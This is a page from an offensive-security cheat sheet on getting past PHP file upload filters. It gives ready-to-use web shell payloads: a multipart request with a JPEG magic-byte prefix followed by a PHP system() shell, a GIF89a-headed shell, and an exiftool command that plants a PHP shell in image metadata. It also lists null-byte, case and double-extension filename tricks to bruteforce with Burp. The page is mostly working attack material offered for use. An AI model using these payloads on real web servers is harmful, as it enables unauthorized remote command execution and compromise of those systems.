File Upload

PHP file upload bypass

Use MIME type (magic bytes of an image file). Upload a simple image file and only keep the first few bytes of the content and change the file name to "pic.jpg.php" while keeping the Content-Type: image/jpeg.

// Some code

Content-Disposition: form-data; name="imagen"; filename="pic.jpg.php"
Content-Type: image/jpeg

// Base64 decode this line before sending the request
/9j/4AAQSkZJRgABAQEAYABgAAD//gA7Q1JFQVRPUjogZ2QtanBlZyB2MS4wICh1c2luZyBJSkcgSlBFRyB2OTApLCBxdWFsaXR5ID0gOTAK/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgAyADIAwEiAAIRAQMRAf/EAB8AAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUSITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJ
<?php echo system($_REQUEST['cmd']);?>

// GIF89a; header
GIF89a;
<?
system($_GET['cmd']); # shellcode goes here
?>

Exiftool

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
mv file.jpg file.php.jpg

Add special characters, null bytes. Use burp to bruteforce.

file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....

Use double extensions to deceive

file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
flile.phpJunk123png

file.png.jpg.php
file.php%00.png%00.jpg

PreviousFile Inclusion NextInsecure Deserialization

Last updated 2 months ago